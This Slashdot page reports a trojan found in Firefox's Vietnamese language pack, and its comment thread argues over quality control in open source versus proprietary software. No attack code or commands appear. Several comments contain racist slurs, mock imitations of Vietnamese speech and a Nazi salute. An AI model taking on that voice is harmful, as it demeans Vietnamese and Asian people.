×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Firefox Vietnamese Language Pack Infected With Trojan

timothy posted more than 5 years ago | from the when-childhood-goes-wrong dept.

Mozilla 200

An anonymous reader writes "Wired.com is reporting that the Firefox browser has been unknowingly distributing a trojan with the Firefox Vietnamese language pack. Over 16,000 downloads of the pack occurred since being infected. This highlights a risk on relying on user-submitted Firefox extensions, or a lack of peer-review of the extensions, many of which receive frequent upgrades."

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

200 comments

Some extensions get a lot of updates (0)

Anonymous Coward | more than 5 years ago | (#23336368)

I always wondered if there's a trojan when I see these +.0.0.0.1 updates to some extension I last used a zillion years ago. Now we know it could happen.

Have you ever *heard* Vietnamese? (-1, Troll)

Anonymous Coward | more than 5 years ago | (#23336382)

They're probably better off with the trojan.

Ming bong wong dong phong. Buerng shuer!

Mao. Mao! MAO!

Wang bong long.

UBUNTU!

MOD PARENT DOWN (2, Insightful)

SteveFoerster (136027) | more than 5 years ago | (#23336830)

This was modded funny? If OP had called them a derogatory term would it have been modded insightful? What a disgrace.

Micro$oft FTW!!!11!! (-1, Troll)

Anonymous Coward | more than 5 years ago | (#23336390)

This is why Open Source sucks! Long live Microsoft!

A rebuttal (3, Funny)

Bragador (1036480) | more than 5 years ago | (#23337030)

Your reasoning is flawed.

You are coming to the conclusion that open source "sucks" because a trojan was supplied with one version of Mozilla Firefox. The problem with that reasoning is twofold:

1) The problem was detected nonetheless

2) It is being fixed rather quickly

Another problem with your reasoning is that you jump to saying "Long live microsoft!". While I applaud you for sharing your love, the link between a competitor's browser having a problem and your love of Microsoft is quite shallow.

For example, you could have said "long live Internet Explorer" and it would have made a bit more sense but not that much. Indeed, you assume that because Firefox has a problem, the other browser has no problems of its own.

Also, why Microsoft ? This is another flaw in your reasonning. There is opera, and safari for example. So exclusively backing Microsoft's product because of a problem with firefox is a weak argument at best.

In conclusion, I state that we can't support your love of Microsoft solely based on your argument.

Thank you for your precious time.

Sincerely,

Me

Re:A rebuttal (1, Insightful)

Anonymous Coward | more than 5 years ago | (#23337200)

"1) The problem was detected nonetheless

2) It is being fixed rather quickly"

Yea, after 16,000+ downloads... doesn't seem quick enough to me.

Re:A rebuttal (1)

Bragador (1036480) | more than 5 years ago | (#23337438)

Problems don't identify themselves as problems. Humans must identify them first.

Also, 16 000 is not much compared to the millions of downloads of firefox. In this context, it was quick. In a closed source project you can't even verify. For example, utorrent might have a backdoor for the authorities and nobody would know until it's too late.

Re:Micro$oft FTW!!!11!! (-1, Troll)

Anonymous Coward | more than 5 years ago | (#23337136)

Zeig Hail

infected with Trojans? (5, Funny)

gEvil (beta) (945888) | more than 5 years ago | (#23336400)

So wait...It installs the Greek language pack?

Re:infected with Trojans? (3, Funny)

Yvan256 (722131) | more than 5 years ago | (#23336498)

Yes, and it adds the wooden rabbit [intriguing.com] font, too.

Re:infected with Trojans? (2, Funny)

pragma_x (644215) | more than 5 years ago | (#23336912)

Me, I'm already on the lookout for any updates with large wooden badgers.

Re:infected with Trojans? (1)

electrictroy (912290) | more than 5 years ago | (#23337474)

OH GOOD!

Firefox keeps begging me to update it, and I keep saying "no" "no" "no". Glad I followed that procedure rather than download a trojan.

Re:infected with Trojans? (4, Funny)

betterunixthanunix (980855) | more than 5 years ago | (#23336532)

I guess I was the only one who thought "infected with trojans" was funny. Especially since many of the condoms I've seen are made in south Asia.

Ahhh, me so solly (0)

Anonymous Coward | more than 5 years ago | (#23337198)

Me so solly me infect Vietnamese ranguage pack with Trojan. Me sucky sucky boom boom rong time!

Full metal Jacket (0, Flamebait)

UberHoser (868520) | more than 5 years ago | (#23336402)

Me so horney
Me love you longtime
You got Trojan ?
Me love you longtime !!!!!

Re:Full metal Jacket (-1, Troll)

Anonymous Coward | more than 5 years ago | (#23336564)

No, No Nooooo, toooo big!

Genuine Alabama Black Snake.

Downside of OSS (4, Interesting)

elrous0 (869638) | more than 5 years ago | (#23336412)

I know this isn't going to be a popular opinion here, but two of the big downsides of open source software to me are the lack of documentation and the lack of quality control. Sure, OSS has THEORETICAL quality control (because anyone can review it), but how often does that REALLY happen? If someone slipped in a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?

I'm not saying commercial software is perfect in that regard (there have been cases of commerically distributed software containing malware too), but at least there is generally some level of quality control there.

Re:Downside of OSS (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#23336484)

And your point would be... what? It seems to me that you just like hearing yourself talk because you are not making a particular case for free software nor commercial software. All you said is both can be infected with malware.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23336596)

B-b-b-ut Microsoft... ZOMGBILLGATES! You closed-source fascist bastard! Open freedom sores, goddammit!

HOW COULD YOU!

Re:Downside of OSS (5, Insightful)

ericlondaits (32714) | more than 5 years ago | (#23336748)

I guess the point is: "the fact that anyone could check the source code at any time should not replace proper QA, which shouldn't be all that different from the one done on commercial software".

I'm sure that Firefox has quite a bit of QA done to it... but it's usefulness relies too much on extensions, which we don't that many assurances about.

Re:Downside of OSS (2, Informative)

Uncle Focker (1277658) | more than 5 years ago | (#23336792)

I'm guessing you didn't read the article. The breakdown came with the fact that the signature of the trojan was unknown at the time it was uploaded and so the anti-virus scan on the extension came up clean. This had nothing to do with a failure of OSS but with the fact that at the time it was an unknown trojan.

Re:Downside of OSS (2, Insightful)

Fourier404 (1129107) | more than 5 years ago | (#23337160)

Except if a person had actually tested it, it would have become pretty obvious that something was wrong.

Re:Downside of OSS (2, Insightful)

Uncle Focker (1277658) | more than 5 years ago | (#23336502)

The virus's signature was unknown at the time, and thus passed Mozilla's testing of add-ons.
Monster fucking fail.

Re:Downside of OSS (2, Interesting)

ttapper04 (955370) | more than 5 years ago | (#23336522)

You are right. It may have something to do with the responsibility a software company has when selling you code. There are flaws in this statement, but what I mean is this:
Joe Six-pack is not going to be as upset when he gets infected by the free thing vs. the thing he had to pay for.
Is this fair to say? Can anyone say that better then me?

Re:Downside of OSS (2, Insightful)

Henry V .009 (518000) | more than 5 years ago | (#23336612)

Yeah. When the hackers steal his identity and ruin his credit, he'll just be cool about it and say "Well, I still love Firefox; I got hacked, but it's not like I had to pay money for this software!."

Re:Downside of OSS (2, Insightful)

kilgortrout (674919) | more than 5 years ago | (#23336544)

If someone slipped in a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?
Less than three months according to the article.

Re:Downside of OSS (4, Interesting)

jrumney (197329) | more than 5 years ago | (#23336662)

In fact, it is more like less than one month, since the other two months is attributable to the delay in anti-virus vendors recognizing the trojan.

Re:Downside of OSS (3, Funny)

Uncle Focker (1277658) | more than 5 years ago | (#23336728)

So was Mozilla using a proprietary anti-virus software? Better hope not, or the ggp is going to have his entire point demolished.

Re:Downside of OSS (2, Insightful)

Uncle Focker (1277658) | more than 5 years ago | (#23336548)

but at least there is generally some level of quality control there
Hahahahahahaha. You must not deal with much proprietary software to make such hilarious statements. In fact it my experience the statement is just the opposite.

Re:Downside of OSS (2, Interesting)

dave420 (699308) | more than 5 years ago | (#23336994)

No, the "hahaha" is on you, if you think proprietary software has no quality control. It has plenty. So does Open Source software. When you spend money on a closed-source package, chances are that software house has a QA department. I don't mean to be rude to anyone or piss anyone off, but the same can't be said for most OSS projects, apart from those released through the few large OSS houses that have their own QA departments. Just because you've found bugs in closed-source software doesn't mean they don't have QA. The fact that they do have QA demonstrates you're wrong on that. People find bugs in open-source software, too - by your logic, OSS is just as bad as closed-source. Great jerrrb.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337100)

What the fuck are you talking [gentoo.org] about [mozilla.org]?

Re:Downside of OSS (1, Insightful)

Uncle Focker (1277658) | more than 5 years ago | (#23337268)

No, the "hahaha" is on you, if you think proprietary software has no quality control.
Good thing I never made such a proclamation. If you think I did please quote the relevant section.

It has plenty.
By plenty, you mean the bare minimum? Cause that's what happens in almost every case.

When you spend money on a closed-source package, chances are that software house has a QA department.
So? If someone slips in a trojan into their software that is undetectable to their virus scanners, as was the case here, how exactly is that big bad QA department going to prevent it from being released? Oh, you mean it won't?

I don't mean to be rude to anyone or piss anyone off, but the same can't be said for most OSS projects, apart from those released through the few large OSS houses that have their own QA departments.
And yet most of these projects without a QA department are still able to make software of quality rivaling these proprietary vendors. A fact that was acknowledged by Microsoft themselves in private emails. Kind of makes it rather pathetic that with those big QA departments that in most cases they are only marginally better their OSS rivals, no?

Just because you've found bugs in closed-source software doesn't mean they don't have QA.
Repeating yourself again? I never made the claim and you'll never find a quote where I said so.

The fact that they do have QA demonstrates you're wrong on that.
Wrong on what? You're attacking a strawman. Please provide the direct quote where I say any proprietary vendor has no QA department.

People find bugs in open-source software, too - by your logic, OSS is just as bad as closed-source. Great jerrrb.
Again, attacking a strawman. Nothing in there is "my" logic. It's just you attempting to put words in my mouth.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337582)

No, the "hahaha" is on you, if you think proprietary software has no quality control.
Good thing I never made such a proclamation. If you think I did please quote the relevant section.


I'm not the gp, but here:

but at least there is generally some level of quality control there ["there" meaning "in commercial software"]
Hahahahahahaha. You must not deal with much proprietary software to make such hilarious statements. In fact it my experience the statement is just the opposite.

So your experience is "the opposite" of "there is generally some level of quality control in commercial software", which would be "there is generally no level of quality control in commercial software".

Re:Downside of OSS (1)

Kent Recal (714863) | more than 5 years ago | (#23337312)

When you spend money on a closed-source package, chances are that software house has a QA department.

So, having a QA department makes better software? Someone at microsoft must have missed the memo...

Re:Downside of OSS (4, Insightful)

Keyper7 (1160079) | more than 5 years ago | (#23336562)

Open source allows greater quality control than closed source. If Mozilla did not use this potential, it's their fault and not the open source process'. In fact, the problem here is that the quality control used by Mozilla was not open source enough. They only did automatic scanning, something that can be done in compiled binaries, when a simple code-checking (notice that an extension source is not that big) would get the malicious code rather quickly.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23336980)

Have you seen the obfuscation contents that hackers have? I know I was surprised at how easily code can look ok but have a purpose built flaw in it (signed problem for instance). Unless you really know the code very well you probably wouldn't catch something like that which can be exploited if in the right place.

Re:Downside of OSS (3, Insightful)

dave420 (699308) | more than 5 years ago | (#23337070)

Open source means the QA can be shifted from a group of QA workers in an office to people who use the software. Both approaches work, and both are not perfect. Saying one is inherently better than the other is a bit strange, as they both achieve the same thing, only in different places. QA performed in-house has access to the source code, and can highlight errors and get them fixed, just the same as any OSS project. The only difference is the QA workers are getting paid for it, and are working directly with the developers. I'm not saying that's better, it's just what happens.

Re:Downside of OSS (5, Insightful)

peragrin (659227) | more than 5 years ago | (#23336574)

right quality control in closed source. bullshite.

How many refurburished ipods have had viruses on them/ How many sb thumb drives with custom controls and drivers have had viruses on them? How may times has MSFT released a service pack only to pull it a day or two later because 50% of the installs would fail horribly?

OSS has a far better track record on quality control. Even better OSS software knows exactly how many times it has been downloaded and releases the exact date at which the infection happened. That is information that is NEVER released by closed source companies.

OSS is far from perfect, but it has a much better track record than closed source software. And when it does fail, everything about the failure is spelled out in details so that particular failure is less likely to happen. Unlike closed companies whose own management don't even know what really happened.

Re:Downside of OSS (1)

urcreepyneighbor (1171755) | more than 5 years ago | (#23336776)

How many refurburished ipods have had viruses on them/ How many sb thumb drives with custom controls and drivers have had viruses on them? How may times has MSFT released a service pack only to pull it a day or two later because 50% of the installs would fail horribly?
Yeah, see, but... you can hold companies responsible. Who will be held responsible for this trojan? Hm? With the Sony rootkit, we knew. With OSS, "some guy that posted it" just doesn't cut it.

Re:Downside of OSS (1)

BlueLightning (442320) | more than 5 years ago | (#23337104)

Yeah, and just see how far you get with a liability claim against almost any proprietary software vendor. They will just point to their EULA, which you must have agreed to in order to use their software, that disclaims any and all liability on their part. So you can't really hold them responsible, not in a legal sense.

Re:Downside of OSS (1)

Sancho (17056) | more than 5 years ago | (#23337210)

You can still sue them and ask to have that portion of the EULA stricken as unenforceable.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337298)

Yeah, but the MPL, GPL, etc. all have that same type of clause in their license.

So you could do the same to Mozilla. However, either way, proprietary or OSS, you're going to have a tough battle on your hands.

Re:Downside of OSS (1)

Sancho (17056) | more than 5 years ago | (#23337406)

I wasn't suggesting otherwise--I was just responding to the person who thought that EULAs could disclaim liability of proprietary software companies.

Re:Downside of OSS (1)

dave420 (699308) | more than 5 years ago | (#23337094)

Using a few examples of flawed QA to claim all closed-source QA doesn't happen is a ridiculous argument. I could point out how many flaws are introduced in updates to open-source software, and use your logic to say OSS has no QA. OSS has enough merits to guarantee it a very glorious future - we don't have to make stuff up or sensationalise problems both camps go through to distort reality. FUD - I thought we didn't like that here.

Re:Downside of OSS (2, Insightful)

cyfer2000 (548592) | more than 5 years ago | (#23336586)

So company or organization supported OSS projects with proper QA is the solution.

Re:Downside of OSS (3, Interesting)

RiotingPacifist (1228016) | more than 5 years ago | (#23336620)

The Downside is when the project gets too big, the number of users >>> developers so resources get stretched to try and satisfy the large number of users and the quality of the project drops.

Re:Downside of OSS (2, Insightful)

TheVelvetFlamebait (986083) | more than 5 years ago | (#23336640)

Open Source should be treated with care, just like any other software you download from the net. Stick to the lighted paths and generally you should be fine. In this case, we have user-generated code which can be iffy, but you can feel fairly safe if it has been downloaded and used a number of times. These things usually come out into the open sooner or later.

Re:Downside of OSS (1)

maxume (22995) | more than 5 years ago | (#23336678)

How does the world "commercial" do anything to ensure a higher level of quality control than the word "open". Here's a hint, it doesn't.

I certainly trust IBM and Sun (wearing their closed source hat) and Microsoft and Intel to have a certain level of quality control, but I don't really expect Redhat or Sun (wearing their open source hat) to have any lower level of quality control, so to some extent, it's a false dichotomy.

It goes further than that though, I don't really expect anything of a company that I have never heard of or dealt with, they need to demonstrate that they have some level of quality control, not say "we're commercial" in order to gain any trust.

Re:Downside of OSS (1)

ericlondaits (32714) | more than 5 years ago | (#23336856)

The difference is that in the closed source world something as basic as a language pack would come with the same QA that the program... while Firefox doesn't give much assurance beyond what they directly produce, although the value of the product is directly connected to the availability of third party extensions.

In the same way, I'm pretty sure that the Ubuntu or Red Hat guys are giving me a good kernel and core libraries with their distro... but I find it hard to believe that any serious QA is done to the huge amount of packages that are distributed with any average distro... specially given that many of those don't hide the fact that they are experimental or beta-quality (when I had an aDSL connection that used PPPoA [PPP over ATM] the only linux package that supported this was slightly less than beta).

Re:Downside of OSS (1)

Uncle Focker (1277658) | more than 5 years ago | (#23336910)

The difference is that in the closed source world something as basic as a language pack would come with the same QA that the program... while Firefox doesn't give much assurance beyond what they directly produce, although the value of the product is directly connected to the availability of third party extensions.

The virus's signature was unknown at the time, and thus passed Mozilla's testing of add-ons.

Mozilla ran an anti-virus check on the most recent version in February when it was added to the official Firefox add-ons site, but the Trojan's virus signature was not known until April.
So basically according to you Mozilla is supposed to be able to recognize trojans whose signatures are unknown to any anti-virus software?

Re:Downside of OSS (1)

ericlondaits (32714) | more than 5 years ago | (#23337180)

Running third party software through an antivirus is not QA.

I don't even begin to understand how a trojan can be slipped inside a LANGUAGE pack.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337308)

So basically you're saying that a virus scanner is a proper substitute for putting actual eyes on code??

That sure seems like what you are saying since you seem to be solely blaming the virus scanner.

Re:Downside of OSS (1)

Uncle Focker (1277658) | more than 5 years ago | (#23337382)

So basically you're saying that a virus scanner is a proper substitute for putting actual eyes on code??
No, but it's no less checking than Opera does for the 3rd party add-ons they host for their proprietary browser. If I were to create a trojan and upload it to Opera's site and it bypasses any virus scans, is that somehow the fault of the proprietary business model? No. It's just the fact that sometimes you can't always check everything. Especially when a group gets thousands upon thousands of these 3rd party add-ons submitted.

That sure seems like what you are saying since you seem to be solely blaming the virus scanner.
Nope, it's just you putting words in my mouth.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337410)

I worked on a (commercial) product that could do just that. So they just picked the wrong software.

Re:Downside of OSS (1)

Uncle Focker (1277658) | more than 5 years ago | (#23337464)

So they just picked the wrong software.
You mean except for the fact that none of the anti-virus software out the time could detect the trojan? Did you even read about the part where it said that the trojan signature wasn't known about until 2 months later?

Re:Downside of OSS (1)

maxume (22995) | more than 5 years ago | (#23336974)

Opera sidesteps the problem of QAing their Vietnamese language pack by not having one:

http://www.opera.com/download/languagefiles/ [opera.com]

(I'm not trying to slam Opera here)

Certainly with open source you need to understand who is providing what, but the open source part isn't the problem, the who is the problem, just like with anything else.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23336700)

You do realize that it's just as easy to have put a virus into an add-on for a proprietary browser as well, right? Explain to me exactly how for no other reason than being closed-source does that attack vector get closed for software like IE or Opera? Oh, you mean it doesn't? Yeah, you're just spreading FUD.

Re:Downside of OSS (5, Insightful)

JustinOpinion (1246824) | more than 5 years ago | (#23336718)

To be fair, this particular sequence of events could have happened to a proprietary product as well. The article explains that an add-on developer uploaded a new version of the language pack. The language pack was automatically scanned for viruses, and found to be clean (since the signature for this particular Trojan wasn't yet known). It appears that this occurred because the developer's computer was infected (i.e.: this was accidental, not intentional, on the part of the contributor).

This isn't too different from a hypothetical employee whose home computer is infected, and who is working from home and emails a module to his boss, who merges it into the final product. If his home computer was infected, and the standard virus scans missed it, then the final product could end up having Trojan code buried inside.

Would the company necessarily have caught the Trojan? Doubtful. They, too, would probably not have done a line-by-line review of each module update that is submitted.

So I'm not convinced this can be pointed to as a failing of the OSS development model per se. The only difference is that the OSS user contributor is perhaps less well-known (less trustworthy?) to the distributors than in a corporate setting. (But, again, this wasn't a problem of trust... this was a contributor machine being infected. And I assure you that corporate developers can and do get their machines infected.)

Nevertheless, this points to a breakdown in Mozilla's auditing practices. They should be very careful with any code they distribute. But these kinds of quality-control breakdowns occur in OSS projects and corporations, too. (One could tangentially argue that at least with OSS, breaches are likely to be publicized, whereas companies will frequently try to suppress information that points out a security breach.)

Re:Downside of OSS (4, Informative)

Paradise Pete (33184) | more than 5 years ago | (#23336730)

I'm not saying commercial software is perfect in that regard (there have been cases of commerically distributed software containing malware too), but at least there is generally some level of quality control there.

Creative MP3 players ship with virus [theregister.co.uk]
Apple Ships iPods with Windows Virus [betanews.com]
Seagate Storage Units Ship with Virus [eweek.com]
Sega Dreamcast console game spreads virus [findarticles.com]
Maxtor USB Hard Drives Ship Virus Infected [everythingusb.com]
Digital photo frames ship with computer virus [itrportal.com]
Sony Ships Rootkit [schneier.com]

Re:Downside of OSS (1)

Hatta (162192) | more than 5 years ago | (#23336738)

Nice troll. There are 34 comments on this article, and 13 of them are in response to your post. That's over 1/3 of the discussion so far. Excellent work.

Re:Downside of OSS (1)

elrous0 (869638) | more than 5 years ago | (#23336814)

Since the popular definition of troll seems to be "Anyone who posts anything that I disagree with," I shall label you a troll as well.

Re:Downside of OSS (1)

Uncle Focker (1277658) | more than 5 years ago | (#23336872)

No, the definition of a troll is someone who post inflammatory material in order to get responses which is what you did. Your anti-OSS FUD has little bearing when it comes to the actual reality of this case. The problem was with the fact that this trojan had an unknown signature and thus was able to slip in past the virus scanner being used by mozilla. And here's the real kicker, proprietary anti-virus scanners, the stuff you are trying to claim is the pinnacle of software QA, didn't know about it till March.

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23336740)

You forget that OSS and commercial software are not mutually exclusive.

It's true that the archetypal OSS project with a single founder and a loose developer community may lack formal quality control, but there also exist many OSS projects funded or even founded by companies which do have formal procedures for QA.

As an OSS projects matures, its development process also tends to improve, and while slips like this can never be completely prevented, it's unfair to make sweeping statements like yours

Whether a given piece of software is OSS or proprietary has no inherent effect on its quality. Because the OSS development process is naturally more open, the problems that every software project has (some more than others though) are more visible. This is emphasised by the "release early, release often" development model which is common in OSS projects.

In the end, it's up to the user to evaluate the strengths and weaknessess of a product, and this applies equally to both OSS and proprietary software

Re:Downside of OSS (1)

Zero__Kelvin (151819) | more than 5 years ago | (#23336834)

"Sure, OSS has THEORETICAL quality control (because anyone can review it), but how often does that REALLY happen? If someone slipped in a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?"
Sure, proprietary software has THEORETICAL quality control (because they are charging for it), but how often does that REALLY happen? If someone slipped in a virus into some proprietary program (which they, of course, only distribute as a binary), how long, if ever, would it be before anyone caught it?

So that particular "downside" of F/OSS is also a "downside" with proprietary software (which means of course that you have labeled something as a downside that is in fact not one - thus the quotes), with the difference being that there is the upside with F/OSS that you, the consumer, can do your own QC if you so desire, and others are likely to do it for you if you don't.

Hmmmm ... I'll take the OSS "downside" over the proprietary "downside" any day!

Re:Downside of OSS (0)

Anonymous Coward | more than 5 years ago | (#23337580)

No... The problem with OSS is that ANYONE can download it and put ANYTHING in the source they want in it. And if someone accepts the patch as valid, then it's in, exploit, virus, trojan or whatever, it's in. Yea, people CAN look at the code, but how many people DO? How many people would even know what they are looking at if they did?

All those eyes staring at source code sure seemed to help this time, eh? 16,000 infected DL's? Obviously no one in the OSS community, where every one magically knows how to read and understand source code, looked at this code. Oh yea, it's all the virus scanner softwares fault. The virus scanner reported to them there was no need to look at the code? (/me imagines the virus scanner waving its arm and doing some kind of Jedi mind trick...)

You know if this had been Microsoft y'all would be calling for jail time for someone for gross negligence.

Now, when is the last time MS or Oracle or, well you get the idea, let you DL their (non-open) source code and submit patches to them?

See, MS and all the rest actually PAY their people to do work, so what is the incentive for THEM to insert something malicious and potentially lose their job or worse?

Who payed that guy that submitted the OSS patch with malicious code? Is he worried about losing his job over this? Oh, you mean he has no fear of repercussions? Well, why would anyone ever do something they weren't afraid of doing... wait... what?

Re:Downside of OSS (2, Insightful)

_Sprocket_ (42527) | more than 5 years ago | (#23336906)

I'm not saying commercial software is perfect in that regard (there have been cases of commerically distributed software containing malware too), but at least there is generally some level of quality control there.
Quality control fails in the proprietary software world (aside - OSS is commercial as well) but hey... at least it's there! Meanwhile, this particular case is supposed to be an example of how OSS has no quality control? And we see the same failures in the quality-controlled proprietary world? I'm not following your logic.

You ask how long it would take to find a virus slipped in to an OSS program? Interesting question. A little bit of Googling would show where major OSS projects were compromised and malicious code was discovered and cleaned within a rather short period of time. Of course - that's not quite a virus. One of the ELF infecting viruses made its rounds by being attached to a supposed exploit and being tossed out in to the community. That had a short run. Although I wouldn't quite classify this as a OSS example. The interesting thing here is that for an environment that you claim lacks quality control, there's something going on that's catching this stuff.

Re:Downside of OSS (1)

kdemetter (965669) | more than 5 years ago | (#23337010)

I know this isn't going to be a popular opinion here, but two of the big downsides of open source software to me are the lack of documentation and the lack of quality control. Sure, OSS has THEORETICAL quality control (because anyone can review it), but how often does that REALLY happen? If someone slipped in a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?


I'm not saying commercial software is perfect in that regard (there have been cases of commerically distributed software containing malware too), but at least there is generally some level of quality control there.

actually , that is incorrect . The entire nature of open source forces it to make sure peer review is enforced , because of the danger .

In closed source this can happen just as easily , but the control will be more relaxed because they think it will be safer.

Just look up AES , and you will know it is possible

Re:Downside of OSS (1)

Omnifarious (11933) | more than 5 years ago | (#23337140)

If you have ever worked for a closed source software maker you wouldn't be talking about the quality control in closed source.

Yes, I agree that having a trojan slipped in is a little less likely as it would require a malicious employee rather than a malicious random contributor. But the quality of the code is utterly and horribly abysmal. For every trojan that doesn't make it in there must be at least 500 security bugs that make it out because of the horrible quality control of closed source.

The software industry is currently in worse shape than Detroit auto manufacturers in the 70s. Way worse shape.

Re:Downside of OSS (1)

value_added (719364) | more than 5 years ago | (#23337448)

I know this isn't going to be a popular opinion here, but two of the big downsides of open source software to me are the lack of documentation and the lack of quality control.

I'll refrain from asking what you mean by quality control, but documentation? Seriously? Outside of OSS, you'd be hard pressed (with a few exceptions) to find anything that has any meaningful documentation. And if you're looking for hand-holding HowTo's or FAQs, well, the web is littered with them.

Windows, for example, offers little more than beginner-oriented help files and a collection of goofy wizards. If I'm looking for documentation, my choices are subscribe to MSDN/Technet, spend my time trawling the Microsoft site, use the trial-and-error approach to "guess" what's happening or how things work, or dick around with Google. By comparison, a typical Ubuntu system probably has more than a typical user would ever want or need. If you use FreeBSD, the Handbook covers all topics, and the manpages document everything in its entirety. If you need more than that, well, the code is readily available and the tools are at your disposable to find what you need in seconds.

The reason why the expression RTFM is never heard in the Windows world is that there generally is no manual to read. That, and the fact that the eleventy million mailing lists dedicated to OSS don't exist, precluding anyone from using the expression.

Re:Downside of OSS (1)

hunteke (1172571) | more than 5 years ago | (#23337454)

two of the big downsides of open source software to me are the lack of documentation

Proof, please. Documentation is highly dependent on a number of things, not the least of which is the projects you use. This is true in any paradigm, OpenSource, proprietary, something-you-bought-at-Walmart, or any other project. For instance, from my point of view (as all things are, eh?) the Postgres [postgresql.org] has absolutely excellent documentation. Not only does it describe options, tools, and how to setup and use Postgres, but it gives you context, like when one should consider a certain setup or action, what the known bugs/caveats exist, and even the core concepts of lots of problems. It is so good, in fact, that even when I use other database products, I quite often will find myself using the Postgres documentation to help me understand how to better to solve my problem with the other database.

Now juxtapose Postgres' documentation with, say, that of OpenOffice. The OpenOffice documentation has the advantage of context sensitive help. Whenever I click a help button, it doesn't just point me to "the docs", but it opens up the exact page and scroll position of where I should start reading. However, it's documentation is not quite as thorough as Postgres. I will often have to do some experimentation before I understand exactly what I've messed up or need to do.

And finally, for a third example, take a look at Mozilla Thunderbird. It doesn't even include help (at least my copy of it through Gutsy), but points me back to the website (via the Help menu). Perusing the website, the best documentation I see is a series of Howto's for different specific tasks. Not very thorough.

Saying that OpenSource documention "sucks" [paraphrased] is inaccurate and way too general. It also attempts an untrue quality distinction from proprietary software. Have you ever had to deal with Microsoft errors? For example, the Windows Update Tool (via Internet Explorer) will sometimes fail, and yields merely a diagnostic code. So, you put the code in the search, and the documentation is a sparse help page saying that the update may have failed for one of a few reasons. The usual suggestion is to reboot and try again. You do so, and get the same error message. I'm not saying anything about the quality of the product, but of the unhelpful documentation from a proprietary company. (I have plenty of other proprietary-documentation-sucks examples if you'd really like.)

And, just like with OpenSource, there is good documentation with different proprietary products as well: Oracle provides some good documentation with their database. The best documentation from them is not free, but the Oracle administration handbook (read: frickin' monstrous club) is very helpful and well-written.

and the lack of quality control.

This is the real issue this time around, and also is hard to nail down exactly what it means. What is quality? Security? Lack of crashes? Useful-to-users? Once again, this is also highly project and problem dependent. Since I've already fanboied the Postgres project, I'll use it again: extremely high quality product for the problem the project attempts to address. You want an ACID database? Look no further. Postgres makes you work really hard if you want to corrupt your data. It even has transactional DDL statements. (Oracle doesn't even have that.) You want security? The entire Postgres project, from the product, to the documentation, and even to the community, practice and preach doing things "the right way."

On the other hand, then there are examples like the OP, that let this trojan creep in. Where's the quality control, you ask? Well, for my purposes, Firefox is still an incredibly high-quality product. From a historical perspective, the community is obviously creative as Firefox had tabbed browsing way before, at least IE. From an English-speaker's security perspective, it's still incredibly secure for me.

If you want move to other quality-control issues about Firefox, I'll agree with you: the not-beta builds of it (1.x, 2.x) are not very fast and are extremely memory intensive. (I'll decline to comment on FF 3.x until it's no longer in beta.)

To bring this back to documentation, I work on a daily basis with some proprietary tools that also severely lack quality-control. What I find maddening about them, is that I don't even know what I've done wrong. There's not even documentation that "this is a known bug." I have to call tech support to get that information. With OpenSource, I at least know up front that something is buggy.

Sure, OSS has THEORETICAL quality control (because anyone can review it), but how often does that REALLY happen? If someone slipped in a virus into some OSS program (especially easy if they distribute it as a binary), how long, if ever, would it be before anyone caught it?

More often than you might think. That's one of the great ways that versioning control systems help (RCS, CVS, SVN). The suggest you break up your code creation into neat little chunks, "patches", that can be seamlessly merged back into the overall code base. When someone commits a change to the code base, they don't see the entire code base, they see just the change. When you have lots of people on a project, chances are that piece of code one developer changed will get lots of aggregate eyeball-time. Some projects are even more sticklers than others. For instance, the Linux kernel will not accept large patches that they can't review. If you want to have a fair chance of getting your code into the kernel, the core devs want small, neat little patches that they can individually review. A lot of OpenSource projects are this way. (I can't speak for proprietary systems here, but I imagine they're the exact same.)

The issue here is that you think computers and their hardware/software can be 100% secure. You need to stop thinking that way. The most secure computer would be utterly useless: in the current hardware paradigm, it would have no power cords, no batteries, no monitors, no hard drive, no keyboard, no mouse, no internet cable, and no ram. The best you can hope for is to get in the mindset of secure: don't do dumb things (like giving sensitive passwords over non-SSL connections), or automatically clicking yes to all dialog boxes. In general, be aware of your (virtual) surroundings.

Har har (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#23336428)

Gooks got what they deserve

Breaking News (0)

Anonymous Coward | more than 5 years ago | (#23336454)

In our featured story tonight, we uncover that browser extensions, toolbars, and other add-ons may contain malware. In other news, scientists have discovered that the sky is blue.

Re:Breaking News (0)

Anonymous Coward | more than 5 years ago | (#23337164)

Except that this language pack is from Mozilla, so it's a bit more worrying than some random ne'er do well releasing an intentionally infected addon.

Although this shows that Open Source is also... (2, Insightful)

Assmasher (456699) | more than 5 years ago | (#23336466)

...vulnerable to these sorts of attacks (which anyone with any common sense would already know), the fact that it is such an open process means a greater possibility of earlier detection, faster analysis and response, and the rapid repair of the process which made such a gaffe possible. In the closed source world most of these steps would take exponentially longer, and quite often the process would remain the same.

Re:Although this shows that Open Source is also... (0)

Anonymous Coward | more than 5 years ago | (#23337188)

earlier detection, faster analysis and response, and the rapid repair of the process
This makes me wonder WTF they were doing when it took them weeks to OK uploads at addons.mozilla.org. Will the new way make us wait even longer?

Proprietary software has the same risk (2, Interesting)

jrumney (197329) | more than 5 years ago | (#23336474)

